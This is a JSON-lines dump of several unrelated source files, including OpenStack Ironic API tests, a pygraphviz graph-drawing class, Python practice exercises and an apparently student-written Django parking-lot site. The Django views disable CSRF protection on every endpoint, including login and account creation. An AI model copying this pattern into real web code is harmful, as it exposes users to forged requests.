dill.loads(base64.b64decode(data.encode(\"ascii\")))\n\n def check(self, ref: Union[ReferenceImplementation, List[ReferenceImplementation]], group=None) -> \\\n Union[ReferenceResult, List[ReferenceResult]]:\n \"\"\"\n Checks this student implementation against a single or list of reference implementations.\n Returns the :py:class:`ReferenceResult` object(s) resulting from \n those checks.\n\n Args:\n ref (``ReferenceImplementation`` or ``list[ReferenceImplementation]``): the reference(s)\n to run against\n group (``str``, optional): if specified, only annotations in this group will be run\n\n Returns:\n ``ReferenceResult`` or ``list[ReferenceResult]``: the results of the reference \n implementation checks\n \"\"\"\n if isinstance(ref, ReferenceImplementation):\n return ref.run(self.values, group=group)\n elif isinstance(ref, list):\n return [r.run(self.values, group=group) for r in ref]\n else:\n raise ValueError(f\"check cannot take values of type '{type(ref)}'\")\n \n def check_plagiarism(self, student_impls: List[\"StudentImplementation\"], **kwargs) -> List[ReferenceResult]:\n \"\"\"\n Checks this student implementation against a list of other student implementations for \n plagiarism. Uses :py:meth:`create_references` to create\n a randomly-generated reference implementation from this student implementation and runs it\n against each of the implementations in ``student_impls`` using \n :py:meth:`get_impl_results`.\n\n Args:\n student_impls (``list[StudentImplementation]``): other student implementations to run\n against\n **kwargs: keyword arguments passed to \n :py:meth:`create_references` and \n :py:meth:`get_impl_results`\n \n Returns:\n ``list[ReferenceResult]`` or ``numpy.ndarray``: the results of each student \n implementation in ``student_impls`` when run against this student implementation\n \"\"\"\n refs = create_references([self], **kwargs)\n return get_impl_results(refs[0], student_impls, **kwargs)\n\n\nfrom .plagiarism import create_references, get_impl_results\n","sub_path":"pybryt/student.py","file_name":"student.py","file_ext":"py","file_size_in_byte":6079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"77379695","text":"# Copyright 2013 Red Hat, Inc.\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport mock\nfrom oslo_config import cfg\nfrom oslo_utils import uuidutils\nimport pecan\nimport wsme\n\nfrom ironic.api.controllers.v1 import utils\nfrom ironic.common import exception\nfrom ironic import objects\nfrom ironic.tests.api import utils as test_api_utils\nfrom ironic.tests import base\n\nCONF = cfg.CONF\n\n\nclass TestApiUtils(base.TestCase):\n\n def test_validate_limit(self):\n limit = utils.validate_limit(10)\n self.assertEqual(10, 10)\n\n # max limit\n limit = utils.validate_limit(999999999)\n self.assertEqual(CONF.api.max_limit, limit)\n\n # negative\n self.assertRaises(wsme.exc.ClientSideError, utils.validate_limit, -1)\n\n # zero\n self.assertRaises(wsme.exc.ClientSideError, utils.validate_limit, 0)\n\n def test_validate_sort_dir(self):\n sort_dir = utils.validate_sort_dir('asc')\n self.assertEqual('asc', sort_dir)\n\n # invalid sort_dir parameter\n self.assertRaises(wsme.exc.ClientSideError,\n utils.validate_sort_dir,\n 'fake-sort')\n\n\nclass TestNodeIdent(base.TestCase):\n\n def setUp(self):\n super(TestNodeIdent, self).setUp()\n self.valid_name = 'my-host'\n self.valid_uuid = uuidutils.generate_uuid()\n self.invalid_name = 'Mr Plow'\n self.invalid_uuid = '636-555-3226-'\n self.node = test_api_utils.post_get_test_node()\n\n @mock.patch.object(pecan, 'request')\n def test_allow_node_logical_names_pre_name(self, mock_pecan_req):\n mock_pecan_req.version.minor = 1\n self.assertFalse(utils.allow_node_logical_names())\n\n @mock.patch.object(pecan, 'request')\n def test_allow_node_logical_names_post_name(self, mock_pecan_req):\n mock_pecan_req.version.minor = 5\n self.assertTrue(utils.allow_node_logical_names())\n\n def test_is_valid_node_name(self):\n self.assertTrue(utils.is_valid_node_name(self.valid_name))\n self.assertFalse(utils.is_valid_node_name(self.invalid_name))\n self.assertFalse(utils.is_valid_node_name(self.valid_uuid))\n self.assertFalse(utils.is_valid_node_name(self.invalid_uuid))\n\n @mock.patch.object(pecan, 'request')\n @mock.patch.object(utils, 'allow_node_logical_names')\n @mock.patch.object(objects.Node, 'get_by_uuid')\n @mock.patch.object(objects.Node, 'get_by_name')\n def test_get_rpc_node_expect_uuid(self, mock_gbn, mock_gbu, mock_anln,\n mock_pr):\n mock_anln.return_value = True\n self.node['uuid'] = self.valid_uuid\n mock_gbu.return_value = self.node\n self.assertEqual(self.node, utils.get_rpc_node(self.valid_uuid))\n self.assertEqual(1, mock_gbu.call_count)\n self.assertEqual(0, mock_gbn.call_count)\n\n @mock.patch.object(pecan, 'request')\n @mock.patch.object(utils, 'allow_node_logical_names')\n @mock.patch.object(objects.Node, 'get_by_uuid')\n @mock.patch.object(objects.Node, 'get_by_name')\n def test_get_rpc_node_expect_name(self, mock_gbn, mock_gbu, mock_anln,\n mock_pr):\n mock_anln.return_value = True\n self.node['name'] = self.valid_name\n mock_gbn.return_value = self.node\n self.assertEqual(self.node, utils.get_rpc_node(self.valid_name))\n self.assertEqual(0, mock_gbu.call_count)\n self.assertEqual(1, mock_gbn.call_count)\n\n @mock.patch.object(pecan, 'request')\n @mock.patch.object(utils, 'allow_node_logical_names')\n @mock.patch.object(objects.Node, 'get_by_uuid')\n @mock.patch.object(objects.Node, 'get_by_name')\n def test_get_rpc_node_invalid_name(self, mock_gbn, mock_gbu,\n mock_anln, mock_pr):\n mock_anln.return_value = True\n self.assertRaises(exception.InvalidUuidOrName,\n utils.get_rpc_node,\n self.invalid_name)\n\n @mock.patch.object(pecan, 'request')\n @mock.patch.object(utils, 'allow_node_logical_names')\n @mock.patch.object(objects.Node, 'get_by_uuid')\n @mock.patch.object(objects.Node, 'get_by_name')\n def test_get_rpc_node_invalid_uuid(self, mock_gbn, mock_gbu,\n mock_anln, mock_pr):\n mock_anln.return_value = True\n self.assertRaises(exception.InvalidUuidOrName,\n utils.get_rpc_node,\n self.invalid_uuid)\n\n @mock.patch.object(pecan, 'request')\n @mock.patch.object(utils, 'allow_node_logical_names')\n @mock.patch.object(objects.Node, 'get_by_uuid')\n @mock.patch.object(objects.Node, 'get_by_name')\n def test_get_rpc_node_by_uuid_no_logical_name(self, mock_gbn, mock_gbu,\n mock_anln, mock_pr):\n # allow_node_logical_name() should have no effect\n mock_anln.return_value = False\n self.node['uuid'] = self.valid_uuid\n mock_gbu.return_value = self.node\n self.assertEqual(self.node, utils.get_rpc_node(self.valid_uuid))\n self.assertEqual(1, mock_gbu.call_count)\n self.assertEqual(0, mock_gbn.call_count)\n\n @mock.patch.object(pecan, 'request')\n @mock.patch.object(utils, 'allow_node_logical_names')\n @mock.patch.object(objects.Node, 'get_by_uuid')\n @mock.patch.object(objects.Node, 'get_by_name')\n def test_get_rpc_node_by_name_no_logical_name(self, mock_gbn, mock_gbu,\n mock_anln, mock_pr):\n mock_anln.return_value = False\n self.node['name'] = self.valid_name\n mock_gbn.return_value = self.node\n self.assertRaises(exception.NodeNotFound,\n utils.get_rpc_node,\n self.valid_name)\n","sub_path":"ironic/tests/api/v1/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":6363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"647654900","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 10 12:55:48 2019\n\n@author: belisa\n\"\"\"\n\nimport numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport pygraphviz as pgv\n\nclass graph(object):\n def __init__(self, fin_occ, fin_trans, hubs=None, ffac=0.05, facbothdir=0.8,\n dpi=100, cmap='nipy_spectral_r', \n directed=True, nodesep=0.5, splines=\"false\", \n outputorder=\"edgesfirst\", overlap=\"scale\", shift_color=0.8,\n min_size_nodes=0, fac_size_nodes=0.5, nodeshape='circle',\n nodecolor='black', nodefillcolor='black', nodestyle='filled', \n nodelabel='', nodefontsize='10', hubnodeshape='doublecircle',\n hubnodecolor='black', hubnodefillcolor='black',\n hubnodestyle='filled', hubnodelabel='', hubnodefontsize='10',\n node_pos_hfac=1, node_pos_wfac=1,\n min_size_edges=2.5, fac_size_edges=5,\n style_sym_edges=None, style_asym_edges=[\"dashed\", \"dotted\"]):\n \n super(graph, self).__init__()\n \n self.fin_occ=fin_occ\n self.fin_trans=fin_trans\n self.hubs=hubs\n self.ffac=ffac\n self.facbothdir=facbothdir\n self.cmap=plt.get_cmap(cmap)\n self.shift_color=shift_color\n self.min_size_nodes=min_size_nodes\n self.fac_size_nodes=fac_size_nodes\n \n self.nodeshape=nodeshape\n self.nodecolor=nodecolor\n self.nodefillcolor=nodefillcolor\n self.nodestyle=nodestyle\n self.nodelabel=nodelabel\n self.nodefontsize=nodefontsize\n if hubs:\n self.hubnodeshape=hubnodeshape\n self.hubnodecolor=hubnodecolor\n self.hubnodefillcolor=hubnodefillcolor\n self.hubnodestyle=hubnodestyle\n self.hubnodelabel=hubnodelabel\n self.hubnodefontsize=hubnodefontsize\n \n self.node_pos_hfac=node_pos_hfac\n self.node_pos_wfac=node_pos_wfac\n \n self.min_size_edges=min_size_edges\n self.fac_size_edges=fac_size_edges\n self.style_sym_edges=style_sym_edges\n self.style_asym_edges=style_asym_edges \n \n #initializing graph\n self.G = pgv.AGraph(directed=directed, nodesep=nodesep, \n splines=splines, outputorder=outputorder, \n overlap=overlap, dpi=dpi)\n \n self.h = self.occupancy_matrix_from_file()\n self.nodes, self.edges, self.source, self.target, self.f, self.fmin, self.fmax, self.flen = self.sep_transitions_data_from_file() \n \n def occupancy_matrix_from_file(self):\n h = np.loadtxt(self.fin_occ)\n \n maxh = 0\n for j in h:\n maxh = max(maxh, max(j))\n \n return h.T/maxh\n \n def sep_transitions_data_from_file(self):\n source = []\n target = []\n f = []\n with open(self.fin_trans) as fp:\n for j, line in enumerate(fp): \n a,b,c,d,e = line.split()\n \n source.append((int(a),int(b)))\n target.append((int(c),int(d)))\n f.append(float(e))\n \n f = np.array(f)/sum(f)\n fmax = max(f)\n f /= fmax\n fmin = min(f)\n fmax2 = max(f)\n flen = fmax2-fmin\n \n idx_good = [k for k,x in enumerate(f) if x > self.ffac*fmax2]\n f = f[idx_good]\n \n source = [x for k,x in enumerate(source) if k in idx_good]\n target = [x for k,x in enumerate(target) if k in idx_good]\n nodes = list(set(source+target))\n edges = list(zip(source,target))\n \n return nodes, edges, source, target, f, fmin, fmax, flen\n \n def dir_edges(self):\n edges_dec = []\n edges_inc = []\n \n f_dec = []\n f_inc = []\n \n for ((a,b),(c,d),e) in zip(self.source,self.target,self.f):\n if c > a:\n direc = 'inc'\n elif c < a:\n direc = 'dec'\n elif c == a:\n if d > b:\n direc = 'inc'\n elif d < b:\n direc = 'dec'\n \n if direc == 'dec':\n edges_dec.append(((a,b),(c,d)))\n f_dec.append(e)\n elif direc == 'inc':\n edges_inc.append(((a,b),(c,d)))\n f_inc.append(e)\n \n return edges_dec, f_dec, edges_inc, f_inc\n \n def add_nodes(self):\n for (a,b) in self.nodes:\n pos=str(self.node_pos_wfac*a)+','+str(self.node_pos_hfac*b)+'!'\n color, width = color_n_width(self.h[a-1][b-1], self.cmap, self.shift_color, \n self.min_size_nodes, \n self.fac_size_nodes, \n self.fmin, self.flen)\n \n if self.hubs and (a,b) in self.hubs:\n print(a,b)\n self.G.add_node((int(a),int(b)), width=width, shape=self.hubnodeshape,\n color=self.hubnodecolor, fillcolor=self.hubnodefillcolor, \n fixedsize='true', fontsize=self.hubnodefontsize, \n style=self.hubnodestyle, label=self.hubnodelabel, pos=pos)\n else:\n self.G.add_node((int(a),int(b)), width=width, shape=self.nodeshape,\n color=self.nodecolor, fillcolor=self.nodefillcolor, \n fixedsize='true', fontsize=self.nodefontsize, \n style=self.nodestyle, label=self.nodelabel, pos=pos)\n \n def add_edges(self):\n edges = []\n \n edges_dec, f_dec, edges_inc, f_inc = self.dir_edges() \n \n fac1 = self.min_size_edges\n fac2 = self.fac_size_edges\n j = 0\n for (a,b) in edges_dec:\n color1, ewidth1 = color_n_width(f_dec[j], self.cmap, self.shift_color, fac1, fac2, \n self.fmin, self.flen)\n if (b,a) in edges_inc:\n k = edges_inc.index((b,a))\n fmx = max(f_dec[j],f_inc[k])\n fmn = min(f_dec[j],f_inc[k])\n \n color, ewidth = color_n_width(fmx, self.cmap, self.shift_color, fac1, fac2, \n self.fmin, self.flen)\n color2, ewidth2 = color_n_width(f_inc[k], self.cmap, self.shift_color, fac1, fac2, \n self.fmin, self.flen)\n \n if fmx and fmn:\n fmx = max(f_dec[j],f_inc[k])\n fmn = min(f_dec[j],f_inc[k])\n \n if fmn/fmx > self.facbothdir:\n if self.style_sym_edges:\n self.G.add_edge((a,b), color=color, penwidth=ewidth, \n style=self.style_sym_edges, dir=\"both\")\n else:\n self.G.add_edge((a,b), color=color, \n penwidth=ewidth, dir=\"both\")\n edges.append((a,b))\n edges.append((b,a))\n else: \n if f_dec[j] > f_inc[k]:\n style1 = self.style_asym_edges[0]\n style2 = self.style_asym_edges[1]\n else:\n style1 = self.style_asym_edges[1]\n style2 = self.style_asym_edges[0]\n self.G.add_edge(a,b, color=color1, \n penwidth=ewidth1, style=style1)\n self.G.add_edge(b,a, color=color2, \n penwidth=ewidth2, style=style2)\n edges.append((a,b))\n edges.append((b,a))\n \n elif fmn is None:\n if f_dec[j]:\n self.G.add_edge((a,b), color=color1, penwidth=ewidth1, \n style=self.style_asym_edges[0])\n edges.append((a,b))\n elif f_inc[j]:\n self.G.add_edge((b,a), color=color2, penwidth=ewidth2, \n style=self.style_asym_edges[0]) \n edges.append((b,a))\n else:\n if f_dec[j]:\n self.G.add_edge((a,b), color=color1, penwidth=ewidth1, \n style=self.style_asym_edges[0])\n edges.append((a,b))\n j+=1\n \n j = 0\n for (a,b) in edges_inc:\n if (a,b) not in edges:\n if f_inc[j]:\n color2, ewidth2 = color_n_width(f_inc[j], self.cmap, self.shift_color, fac1, fac2, \n self.fmin, self.flen)\n self.G.add_edge((a,b), color=color2, penwidth=ewidth2, \n style=self.style_asym_edges[0])\n \n j+=1\n \n def draw_graph(self, graphname, fmt='eps'):\n try:\n self.add_nodes()\n self.add_edges()\n \n print('Drawing '+graphname)\n self.G.draw(graphname, prog='neato', format=fmt)\n \n except NameError:\n print(\"Error: it was not possible to draw the network.\")\n print(\"Please try choosing a different value for ffac or facbothdir.\")\n print(\"Alternatively, set spline='false'.\")\n\n###############################################################################\n\ndef color_n_width(a, cmap, m, fac1, fac2, vmin, vlen):\n color = cmap((a-m*vmin)/vlen)\n color = mpl.colors.rgb2hex(color)\n width = fac1+fac2*a\n \n return color, width\n","sub_path":"GraphNetwork.py","file_name":"GraphNetwork.py","file_ext":"py","file_size_in_byte":10116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"423458723","text":"# -*- coding: utf-8 -*-\ndef add(x, y, f):\n return f(x) + f(y)\nprint(add(-5, 6, abs))\n#Map/Reduce\ndef normalize(name):\n Name = name.title()\n return(Name)\n # 测试:\nL1 = ['adam', 'LISA', 'barT']\nL2 = list(map(normalize, L1))\nprint(L2)\n#=====\nfrom functools import reduce\ndef prod(L):\n return reduce (lambda x, y : x*y, L)\nprint('3 * 5 * 7 * 9 =', prod([3, 5, 7, 9]))\nif prod([3, 5, 7, 9]) == 945:\n print('Success!')\nelse:\n print('Fail!')\n#=====\ndef str2float(s):\n DIGITS = {'0': 0, '1': 1, '2': 2, '3': 3, '4': 4, '5': 5, '6': 6, '7': 7, '8': 8, '9': 9}\n s = s.split('.')\n\n def fn(x, y):\n return x * 10.0 +y\n def char2num(s):\n return DIGITS[s]\n return reduce(fn, map(char2num, s[0])) + reduce(fn, map(char2num, s[1])) / (10 ** len(s[1]))\n print('str2float(\\'123.456\\') =', str2float('123.456'))\nif abs(str2float('123.456') - 123.456) < 0.00001:\n print('Success!')\nelse:\n print('Fail!')\n#Map/Reduce END\n#Filter\ndef not_empty(s):\n return s and s.strip()\nprint(list(filter(not_empty, ['A', '', ' B', None, 'C', ' '])))\n#Prime number\ndef _odd_iter():\n n = 1\n while True:\n n = n + 2\n yield n\n\ndef _not_divisible(n):\n return lambda x: x % n > 0\n\ndef primes():\n yield 2\n it = _odd_iter()\n while True:\n n = next(it)\n yield n\n it = filter(_not_divisible(n), it)\n\nfor n in primes(): #printPrimes\n if n < 100:\n print(n)\n else:\n break\n#=====\n# def _nums_iter():\n# yield n\n# n = 1\n# while True:\n# n = n + 1\ndef is_palindrome(n):\n n1 = str(n)\n return n1 == n1[::-1]\n# 测试:\noutput = filter(is_palindrome, range(1, 1000))\nprint('1~1000:', list(output))\nif list(filter(is_palindrome, range(1, 200))) == [1, 2, 3, 4, 5, 6, 7, 8, 9, 11, 22, 33, 44, 55, 66, 77, 88, 99, 101, 111, 121, 131, 141, 151, 161, 171, 181, 191]:\n print('Success!')\nelse:\n print('Fail!')\n#Sorted\nL = [('Bob', 75), ('Adam', 92), ('Bart', 66), ('Lisa', 88)]\n\ndef by_name(t):\n return t[0]\nL2 = sorted(L, key=by_name)\nprint(L2)\n\ndef by_score(t):\n return -t[1]\nL2 = sorted(L, key=by_score)\nprint(L2) \n#FanHuiHanShu\ndef createCounter():\n pass #TODO\n# 测试:\n# counterA = createCounter()\n# print(counterA(), counterA(), counterA(), counterA(), counterA()) # 1 2 3 4 5\n# counterB = createCounter()\n# if [counterB(), counterB(), counterB(), counterB()] == [1, 2, 3, 4]:\n# print('Pass!')\n# else:\n# print('Fail!')\n#NiMingHanShu\nL = list(filter(lambda n: n % 2 ==1, range(1, 20)))\nprint(L)\n#ZhaungShiQi\nimport time, functools\ndef metric(fn):\n @functools.wraps(fn)\n def wrapper(*args, **kw):\n start = time.time()\n print('Begin Call!')\n result = fn(*args, **kw)\n end = time.time()\n print('%s executed in %s ms' % (fn.__name__, end - start))\n print('End Call!')\n return result\n return wrapper\n# 测试\n@metric\ndef fast(x, y):\n time.sleep(0.0012)\n return x + y;\n\n@metric\ndef slow(x, y, z):\n time.sleep(0.1234)\n return x * y * z;\n\nf = fast(11, 22)\ns = slow(11, 22, 33)\nif f != 33:\n print('Fail!')\nelif s != 7986:\n print('Fail!')\n#PianHanShu\n","sub_path":"python/pythonPractice/LiaoXueFeng/3HanShuShiBianCheng.py","file_name":"3HanShuShiBianCheng.py","file_ext":"py","file_size_in_byte":3136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"12983247","text":"from django.views.decorators.csrf import csrf_exempt\nfrom django.shortcuts import render\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.template.loader import get_template\nfrom aparcamientos.models import aparcamientos, aparcamientos_seleccionados, configuracion\nfrom parse import crear_basedatos\nfrom parse_distritos import base_distritos\nfrom django.template import RequestContext\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.hashers import make_password\nimport urllib\nfrom django.template import Context\nfrom django.template import RequestContext\nimport sqlite3\nfrom django.core.exceptions import ObjectDoesNotExist\n\n# Create your views here.\n\n\n@csrf_exempt\ndef about (request):\n\tuser_name = request.user.username\n\ttry:\n\t\tuser = User.objects.get(username = user_name)\n\texcept ObjectDoesNotExist: \n\t\tuser = None\n\tcontext = {'user': user}\n\ttemplate = get_template('about.html')\n\treturn HttpResponse(template.render(Context(context)))\n\n\n@csrf_exempt\ndef homepage (request):\n\tmethod = request.method\n\ttodos_aparcamientos = aparcamientos.objects.all()\n\taccesibles = aparcamientos_accesibles(request)\n\tfive_ml = fml(request)\n\tconfg_tds = configuracion.objects.all()\n\tuser_name = request.user.username\n\ttry:\n\t\tuser = User.objects.get(username = user_name)\n\texcept ObjectDoesNotExist: \n\t\tuser = None\n\n\tif not todos_aparcamientos:\n\t\t#Descargo todos los datos del xml\n\t\t(id_entidades, nombres, descripciones, acces, content_urls, nombre_vias, clases_viales, numeros, barrios, distritos, latitudes, longitudes, telefonos, correos, tipos, direcciones, datos_contactos) = crear_basedatos()\n\t\tfor (nom_aparcamiento, descripcion, latitud, longitud, accesibilidad, barrio, distrito, direccion, datos_contacto, url) in zip(nombres, descripciones, latitudes, longitudes, acces, barrios, distritos, direcciones, datos_contactos, content_urls): ##http://javiyu.blogspot.com.es/2008/05/funcin-zip-python.html\n\t\t\tnuevo_aparcamiento = aparcamientos(nombre_aparcamiento = nom_aparcamiento ,descripcion = descripcion,\n\t\t\t\t\t\t\t\tlatitud = latitud ,longitud = longitud, accesibilidad = accesibilidad,\n\t\t\t\t\t\t\t\tbarrio = barrio, distrito = distrito, direccion = direccion, \n\t\t\t\t\t\t\t\tdatos_contacto = datos_contacto, url = url)\n\t\t\tnuevo_aparcamiento.save()\n\n\tif method == 'GET':\n\t\t##Probar con form\n\t\tactivo = 0\n\t\tcontext = {'five_ml': five_ml, 'activo': activo , 'accesibles': accesibles, 'confg_tds' : confg_tds, 'user': user}\n\t\ttemplate = get_template('homepage.html')\n\t\treturn HttpResponse(template.render(Context(context)))\n\n\telif method == 'POST':\n\t\tsubmit = request.POST.get(\"submit\")\n\t\tactivo = request.POST.get(\"activo\")\n\t\tapar_id = request.POST.get(\"likes\")\n\t\tlike = request.POST.get(\"like\")\n\t\tuser_name = request.POST.get(\"user\")\n\t\ttry:\n\t\t\tuser = User.objects.get(username = user_name)\n\t\texcept ObjectDoesNotExist: \n\t\t\tuser = None\n\n\t\tif submit == 'Buscar':\n\t\t\t#Mirar por distrito\n\t\t\ttemplate = todos_aparcamientos_distrito(request)\n\t\t\treturn HttpResponse(template)\n\n\t\tif submit == 'Preferencias':\n\t\t\tuser_name = request.user.username\n\t\t\ttry:\n\t\t\t\tuser = User.objects.get(username = user_name)\n\t\t\texcept ObjectDoesNotExist: \n\t\t\t\tuser = None\n\t\t\ttitulo = request.POST.get(\"titulo\")\n\t\t\tletra = request.POST.get(\"letra\") #integer\n\t\t\tcolor = request.POST.get(\"color\")\n\t\t\tconfig_selec = configuracion.objects.get(id=user.id)\n\t\t\tconfig_selec.usuario = user\n\t\t\tif titulo != '':\n\t\t\t\tconfig_selec.titulo = titulo\n\t\t\tif letra != '':\n\t\t\t\tconfig_selec.letra = letra\n\t\t\tif color != '':\n\t\t\t\tconfig_selec.fondo = color\n\t\t\tconfig_selec.save()\n\t\t\treturn HttpResponseRedirect('/')\n\n\t\tif activo == '1':\n\t\t\tactivo = 1\n\t\t\tcontext = {'five_ml': five_ml, 'activo': activo , 'accesibles': accesibles, 'confg_tds' : confg_tds, 'user': user}\n\t\t\ttemplate = get_template('homepage.html')\n\t\t\treturn HttpResponse(template.render(Context(context)))\n\t\telif activo == '0':\n\t\t\tactivo = 0\n\t\t\tcontext = {'five_ml': five_ml, 'activo': activo , 'accesibles': accesibles, 'user': user}\n\t\t\ttemplate = get_template('homepage.html')\n\t\t\treturn HttpResponse(template.render(Context(context)))\n\t\telif activo == '2':\n\t\t\taparcamient = aparcamientos.objects.all()\n\t\t\tactivo = 2\n\t\t\tcontext = {'five_ml': five_ml, 'activo': activo , 'aparcamientos': aparcamient, 'user': user}\n\t\t\ttemplate = get_template('homepage.html')\n\t\t\treturn HttpResponse(template.render(Context(context)))\n\n\t\tif like == 'LIKE!':\n\t\t\taparca_selec = aparcamientos.objects.get(id=apar_id)\n\t\t\tlikes = aparca_selec.likes + 1\n\t\t\taparca_selec.likes = likes\n\t\t\taparca_selec.save()\n\t\telif like == 'Favorito':\n\t\t\tuser_name = request.user.username\n\t\t\ttry:\n\t\t\t\tuser = User.objects.get(username = user_name)\n\t\t\texcept ObjectDoesNotExist: \n\t\t\t\tuser = None\n\t\t\taparca_selec = aparcamientos.objects.get(id=apar_id)\n\t\t\tnew_selec = aparcamientos_seleccionados(aparcamiento=aparca_selec, usuario=user)\n\t\t\tnew_selec.save()\n\t\treturn HttpResponseRedirect(\"/\")\n\n\telse:\n\t\ttemplate = get_template('405HTTP.html')\n\t\treturn HttpResponse(template.render())\n\n\n@csrf_exempt\ndef nuevo_usuario(request):\n\tuser_name = urllib.parse.unquote(request.POST.get(\"nombre\"))\n\tpassword = make_password(urllib.parse.unquote(request.POST.get(\"password\")))\n\tusuario = User(username = user_name, password = password)\n\tusuario.save()\n\tusuario = User.objects.get(username=user_name)\n\tnueva_conf = configuracion(usuario=usuario)\n\tnueva_conf.save()\n\tprint(\"USUARIO CREADO CON EXITO\")\n\treturn HttpResponseRedirect('/')\n\n\n@csrf_exempt\ndef authenti(request):\n\tconfg_tds = configuracion.objects.all()\n\ttodos_aparcamientos = aparcamientos.objects.all()\n\taccesibles = aparcamientos_accesibles(request)\n\tfive_ml = fml(request)\n\tusername = request.POST.get(\"nombre\")\n\tpassword = request.POST.get(\"password\")\n\tuser = authenticate(username = username, password = password)\n\tif user is not None:\n\t\tlogin(request, user)\n\t\tprint(\"Estoy logueado\")\n\tactivo = 0\n\tcontext = {'five_ml': five_ml, 'activo': activo , 'accesibles': accesibles, 'user': user, 'confg_tds' : confg_tds }\n\ttemplate = get_template('homepage.html')\n\treturn HttpResponse(template.render(Context(context)))\n\n\n@csrf_exempt\ndef fml(request): #Five More Likes\n\taparcas = aparcamientos.objects.all()\n\tFML = []\n\tfor aparca in aparcas:\n\t\tcont = 0\n\t\tfor aparca2 in aparcas:\t\n\t\t\tif aparca.likes > aparca2.likes:\n\t\t\t\tcont = cont + 1\n\t\tif cont > len(aparcas) - 6:\n\t\t\tFML.append(aparca)\n\treturn (FML)\n\n\n@csrf_exempt\ndef todos_los_aparcamientos (request):\n\tmethod = request.method\n\tapars = aparcamientos.objects.all()\n\tdistritos = base_distritos()\n\tuser_name = request.user.username\n\ttry:\n\t\tuser = User.objects.get(username = user_name)\n\texcept ObjectDoesNotExist: \n\t\tuser = None\n\ttemplates = get_template('homepage_aparcamientos.html')\n\taparca = aparcamientos.objects.all()\n\tcontext = {'aparca': aparca, 'distritos': distritos, 'user': user}\n\treturn HttpResponse(templates.render(Context(context)))\n\n\n@csrf_exempt\ndef todos_aparcamientos_distrito(request):\n\tdistritos = base_distritos()\n\tapars = aparcamientos.objects.all()\n\tdistrito = urllib.parse.unquote(request.POST.get(\"nombre\")).upper()\n\tapar_distritos = []\n\ttemplates = get_template('homepage_aparcamientos_distrito.html')\n\tboolean = False\n\tfor apar in apars:\n\t\tif apar.distrito == distrito:\n\t\t\tapar_distritos.append(apar)\n\t\t\tboolean = True\n\tuser_name = request.user.username\n\ttry:\n\t\tuser = User.objects.get(username = user_name)\n\texcept ObjectDoesNotExist: \n\t\tuser = None\n\tcontext = {'distrito': distrito, 'distritos': distritos, 'apar_distritos': apar_distritos, 'boolean': boolean, 'user': user}\n\treturn HttpResponse(templates.render(Context(context)))\n\n\n@csrf_exempt\ndef pag_info_aparcamiento(request,idn):\n\tuser_name = request.user.username\n\ttry:\n\t\tuser = User.objects.get(username = user_name)\n\texcept ObjectDoesNotExist: \n\t\tuser = None\n\taparcamiento = aparcamientos.objects.get(id = idn)\n\ttemplates = get_template('pag_info_aparcamiento.html')\n\tcontext = {'aparcamiento': aparcamiento, 'user': user}\n\treturn HttpResponse(templates.render(Context(context)))\n\n\n@csrf_exempt\ndef aparcamientos_accesibles(request):\n\taccesibles = []\n\tapars = aparcamientos.objects.all()\n\tfor apar in apars:\n\t\tif apar.accesibilidad == 1:\n\t\t\taccesibles.append(apar)\n\treturn accesibles\n\n\n@csrf_exempt\ndef pagina_usuario(request, usuario):\n\tuser_id = User.objects.get(username=usuario).id\n\tconf = configuracion.objects.get(usuario_id = user_id)\n\tuser_name = request.user.username\n\taparcamien = aparcamientos.objects.all()\n\ttry:\n\t\tuser_log = User.objects.get(username = user_name)\n\texcept ObjectDoesNotExist: \n\t\tuser_log = None\n\tuser = User.objects.get(username=usuario)\n\t\n\tapar_selec = aparcamientos_seleccionados.objects.filter(usuario=user.id) #Filtro apar solo de ese usuario\n\tcontext = {'apar_selec': apar_selec, 'user_log': user_log, 'user': user, \n\t\t\t 'aparcamien': aparcamien, 'conf' : conf, 'usuario': usuario}\n\ttemplate = get_template(\"pagina_usuario.html\")\n\treturn HttpResponse(template.render(Context(context)))\n\n@csrf_exempt\ndef usuario_xml(request, user_xml):\n\tfavs = []\n\tuser = User.objects.get(username = user_xml)\n\taparcamiento_fav = aparcamientos_seleccionados.objects.filter(usuario=user)\n\tfor fav in aparcamiento_fav:\n\t\tfavs += [fav.aparcamiento]\n\tcontext = {\"favs\" : favs, 'user_xml': user_xml}\n\ttemplate = get_template(\"usuario.xml\")\n\treturn HttpResponse(template.render(Context(context)), content_type = \"text/xml\")\n\n\n@csrf_exempt\ndef preferencias(request):\n\tuser_name = request.user.username\n\ttry:\n\t\tuser = User.objects.get(username = user_name)\n\texcept ObjectDoesNotExist: \n\t\tuser = None\n\ttemplate = get_template(\"preferencias.html\")\n\tcontext = {'user': user}\n\treturn HttpResponse(template.render(Context(context)))\n\n\n@csrf_exempt\ndef lgout (request):\n\tlogout(request)\n\treturn HttpResponseRedirect('/')\n\n\n@csrf_exempt\ndef ppl_xml(request):\n\tfive_ml = fml(request)\n\tcontext = {'five_ml' : five_ml}\n\ttemplate = get_template(\"likes.xml\")\n\treturn HttpResponse(template.render(Context(context)), content_type = \"text/xml\")\n","sub_path":"aparcamientos/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"70089760","text":"#coding=utf-8\nimport traceback\nimport datetime\nfrom django.core.paginator import Paginator, EmptyPage\nfrom django.db.models import Q, 